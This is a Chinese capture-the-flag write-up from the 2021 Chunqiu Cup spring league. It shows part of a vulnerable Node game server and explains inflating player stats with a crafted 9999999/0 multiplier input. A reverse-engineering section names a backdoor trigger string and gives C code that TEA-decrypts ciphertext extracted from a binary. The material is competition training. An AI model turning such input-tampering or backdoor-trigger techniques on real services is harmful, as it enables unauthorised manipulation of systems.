    const message = `${self.name}现在的状态:ATK:${self.ATK},DEF:${self.DEF},HP:${self.HP},COIN:${session.coin}枚,还剩${session.monster.length}个题`;
    res.send({message});
});
// Fights the next opponent; a win pops it from the list, a loss resets the session on the next request.
app.get("/fight", function (req, res) {
    if (!initSession(req.session)) return;
    const queue = req.session.monster;
    if (queue.length === 0) {
        return res.send({message: CONST.footer.join("n")});
    }
    const self = Obj.deserialzie(req.session.player);
    const opponent = Obj.deserialzie(queue[0]);
    const [won, log] = self.fight(opponent);
    if (won) {
        req.session.monster = queue.slice(1);
        log.push("你赢了耶!");
    } else {
        log.push("你输了,刷新以重新开始");
        req.session.init = false;
    }
    req.session.history = [...req.session.history, ...log];
    res.send({message: log.join("n")});
});
// Serves this file's own source; the path is relative to the process cwd, not __dirname.
app.get("/source", function (_req, res) {
    const source = readFileSync("./src/main.ts");
    res.send(source);
});
// Unauthenticated process shutdown: any client can stop the server with a single GET.
app.get("/exit", function (_req, _res) {
    exit(0);
});
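// Express recognises an error handler only by its arity: four parameters (err, req, res, next).
// The original declared three, so it was registered as ordinary middleware, never ran for
// errors thrown in the routes above, and those fell through to Express's default error page.
app.use((err: any, req: any, res: any, _next: any) => {
    console.error(err.stack);
    res.status(500).send("Something broke!");
});
app.listen(80);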
重要的地方在这里
传入9999999/0,即可把自己的倍数增加到9999999,然后序列化保存。下次反序列化player的时候,player的属性就会超级加倍
一开始是个弱鸡
属性加倍
打出flag
Reverse
backdoor
首先程序会net listen监听端口
输入g01angBackd00r会执行main_Decrypt函数
chal
直接打开文件
根据敏感变量名猜测是tea家族算法
提取出数据
3
3208527578,423585179
3.0
699878777,1677098023
3.4
1664154466,3464319808
3.8
3532878313,2922316096
3.12
2276156225,33987677
3.16
3775107838,3138262082
key
3735928559,3405691582,269488144,16843009
exp
#include <stdio.h>
#include <stdint.h>
//加密函数
/* TEA encryption of one 64-bit block (two 32-bit words) under a 128-bit key.
 * v: block, updated in place; k: the four key words.
 * Runs 32 cycles, each advancing sum by delta and updating both halves. */
void encrypt (uint32_t* v, uint32_t* k) {
    uint32_t left = v[0], right = v[1];
    uint32_t round_sum = 0;
    const uint32_t delta = 0x9e3779b9; /* golden-ratio key schedule constant */
    unsigned cycle;
    for (cycle = 0; cycle < 32; cycle++) {
        round_sum += delta;
        left  += ((right << 4) + k[0]) ^ (right + round_sum) ^ ((right >> 5) + k[1]);
        right += ((left  << 4) + k[2]) ^ (left  + round_sum) ^ ((left  >> 5) + k[3]);
    }
    v[0] = left;
    v[1] = right;
}
//解密函数
/* TEA decryption of one 64-bit block; inverse of encrypt() above.
 * sum starts at 32 * delta (0xC6EF3720) and is unwound by delta each cycle,
 * with the two half-updates applied in reverse order. */
void decrypt (uint32_t* v, uint32_t* k) {
    uint32_t left = v[0], right = v[1];
    uint32_t round_sum = 0xC6EF3720;
    const uint32_t delta = 0x9e3779b9;
    unsigned cycle = 32;
    while (cycle-- > 0) {
        right -= ((left  << 4) + k[2]) ^ (left  + round_sum) ^ ((left  >> 5) + k[3]);
        left  -= ((right << 4) + k[0]) ^ (right + round_sum) ^ ((right >> 5) + k[1]);
        round_sum -= delta;
    }
    v[0] = left;
    v[1] = right;
}
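int main()
{
    /* Key recovered from the binary: four 32-bit words, i.e. a 128-bit TEA key. */
    uint32_t k[4] = {3735928559u, 3405691582u, 269488144u, 16843009u};
    /* The six ciphertext blocks listed above (offsets 3, 3.0, 3.4, 3.8, 3.12, 3.16),
     * two 32-bit words each, in file order. The original decrypted one block per run
     * by editing v[] by hand; looping over all of them prints the whole result at once. */
    uint32_t blocks[6][2] = {
        {3208527578u, 423585179u},
        {699878777u, 1677098023u},
        {1664154466u, 3464319808u},
        {3532878313u, 2922316096u},
        {2276156225u, 33987677u},
        {3775107838u, 3138262082u},
    };
    size_t i;
    for (i = 0; i < sizeof blocks / sizeof blocks[0]; i++) {
        decrypt(blocks[i], k);
        /* Same ",%u,%u" record per block as the original; the listing shows "%un",
         * which reads as a "\n" lost in extraction. */
        printf(",%u,%u\n", blocks[i][0], blocks[i][1]);
    }
    return 0;
}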
本文始发于微信公众号(山警网络空间安全与电子数据取证):2021年春秋杯春季联赛部分WriteUp